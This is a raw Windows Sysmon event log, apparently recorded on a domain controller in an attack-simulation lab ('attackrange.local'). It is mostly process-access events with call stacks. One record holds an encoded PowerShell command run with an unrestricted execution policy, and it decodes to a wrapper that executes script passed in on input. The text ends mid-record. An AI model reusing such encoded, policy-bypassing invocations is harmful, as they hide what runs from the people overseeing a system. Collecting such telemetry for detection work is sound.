15:51:59.131{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002865Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002864Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002863Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002862Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002861Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C9F-5FA1-8A00-000000008801}1808C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002860Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002859Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002858Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C9E-5FA1-8900-000000008801}50044776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C9F-5FA1-8A00-000000008801}1808C:\Windows\system32\chcp.com0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3332f6|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b5560|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b4f07|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+316b32a9(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b54133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b53e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31605469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b1499a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b72e69(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b564ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b564ce(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b5635f(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b482e4(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b54817(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b5440a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b54133(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b53e04(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+31605469(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b3ac65(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\5e34168d1758dfad033ef2bb53d5a1c2\System.Management.Automation.ni.dll+30b3a235(wow64) 154100x80000000000000002857Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.131{D28789B6-7C9F-5FA1-8A00-000000008801}1808C:\Windows\System32\chcp.com10.0.14393.0 (rs1_release.160715-1616)Change CodePage UtilityMicrosoft® Windows® Operating SystemMicrosoft CorporationCHCP.COM"C:\Windows\system32\chcp.com" 65001C:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C9E-5FA1-0936-050000000000}0x536090HighMD5=BA6FD5B883C0899785D17CEBE66A25F6,SHA256=9FDBDF88CF2BB2794C416E3083553F2898AC9DC92DFAC2478B4C1DF667DF7C74,IMPHASH=4FB30D6E330F3FB3DB61550BD7FA7CCD{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA== 10341000x80000000000000002856Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.116{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002855Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.116{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002854Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.116{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002853Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.053{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002852Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.053{D28789B6-7C62-5FA1-0B00-000000008801}8684712C:\Windows\system32\lsass.exe{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+64ebf|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000002851Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.022{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_fxsu3wxw.fte.ps12020-11-03 15:51:59.022 10341000x80000000000000002850Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:59.006{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C9E-5FA1-8900-000000008801}5004C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003016Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.980{D28789B6-7C6A-5FA1-2600-000000008801}30642108C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe{D28789B6-7C6A-5FA1-2500-000000008801}3024C:\Windows\servicing\TrustedInstaller.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.14393.3926_none_7ec739a4221e2b99\TiWorker.exe+3611|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9 10341000x80000000000000003015Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7CA0-5FA1-8C00-000000008801}732C:\Windows\TEMP\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\dismhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003014Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7CA0-5FA1-8C00-000000008801}732C:\Windows\TEMP\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\dismhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003013Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7CA0-5FA1-8B00-000000008801}42963360C:\Windows\system32\wbem\wmiprvse.exe{D28789B6-7CA0-5FA1-8C00-000000008801}732C:\Windows\TEMP\28972AFA-EAAA-4C84-8F88-DB6EC4BEEC98\dismhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\SYSTEM32\Dism\DismCore.dll+271d6|C:\Windows\SYSTEM32\Dism\DismCore.dll+8eaa|C:\Windows\SYSTEM32\Dism\DismCore.dll+58d4|C:\Windows\SYSTEM32\DismApi.DLL+55245|C:\Windows\SYSTEM32\DismApi.DLL+2c42a|C:\Windows\SYSTEM32\DismApi.DLL+25f36|C:\Windows\SYSTEM32\DismApi.DLL+24cdb|C:\Windows\SYSTEM32\DismApi.DLL+2465f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003012Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:52:00.745{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003011Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 